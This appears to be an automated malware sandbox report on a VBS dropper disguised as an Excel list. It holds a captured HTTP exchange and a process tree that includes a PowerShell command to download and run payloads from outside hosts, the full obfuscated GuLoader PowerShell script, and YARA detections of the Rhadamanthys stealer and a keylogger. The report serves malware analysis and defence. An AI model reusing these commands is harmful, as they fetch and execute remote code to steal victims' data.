                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:21 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1352
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                              ETag: "0x8DC582BDD0A87E5"
                                                                                                              x-ms-request-id: 65690675-e01e-000c-7ccc-458e36000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093921Z-1746fd949bdnq7x2hC1EWRpxr000000002cg000000002x0p
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:21 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:1
                                                                                                              Start time:04:38:08
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs"
                                                                                                              Imagebase:0x7ff7de5c0000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:04:38:09
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'
                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:04:38:09
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:7
                                                                                                              Start time:04:38:16
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs"
                                                                                                              Imagebase:0x7ff7de5c0000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:04:38:16
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:wmic diskdrive get caption,serialnumber
                                                                                                              Imagebase:0x7ff6ea0f0000
                                                                                                              File size:576'000 bytes
                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:04:38:16
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:04:38:18
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;"
                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:11
                                                                                                              Start time:04:38:18
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:04:38:28
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;"
                                                                                                              Imagebase:0x520000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000010.00000002.2719542932.0000000008CC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000010.00000002.2696790068.0000000005F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.2719689268.00000000096DF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:04:38:28
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:04:38:37
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\ilurgw960k7fwnm.xlsx"
                                                                                                              Imagebase:0x570000
                                                                                                              File size:53'161'064 bytes
                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:22
                                                                                                              Start time:04:38:39
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff7403e0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:23
                                                                                                              Start time:04:38:57
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                              Imagebase:0x6c0000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000003.2910076907.0000000023BA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.2899229547.00000000243C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000003.2895832685.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.2899023671.00000000241A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:24
                                                                                                              Start time:04:39:20
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                              Imagebase:0x3c0000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.2899852769.0000000003780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2903015148.0000000005950000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2902818252.0000000005730000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000002.2999474579.0000000003820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:04:39:30
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                              Imagebase:0x7ff7403e0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:04:39:42
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr65F9.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/20442955"
                                                                                                              Imagebase:0x7ff684c40000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:27
                                                                                                              Start time:04:39:43
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2240,i,1470549389537924356,18333777287328738215,262144 /prefetch:8
                                                                                                              Imagebase:0x7ff6ae840000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:28
                                                                                                              Start time:04:39:43
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\splwow64.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\splwow64.exe 8192
                                                                                                              Imagebase:0x7ff769290000
                                                                                                              File size:163'840 bytes
                                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:29
                                                                                                              Start time:04:39:44
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6EA4.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/a1d56f56"
                                                                                                              Imagebase:0x7ff715da0000
                                                                                                              File size:4'210'216 bytes
                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:30
                                                                                                              Start time:04:39:46
                                                                                                              Start date:05/12/2024
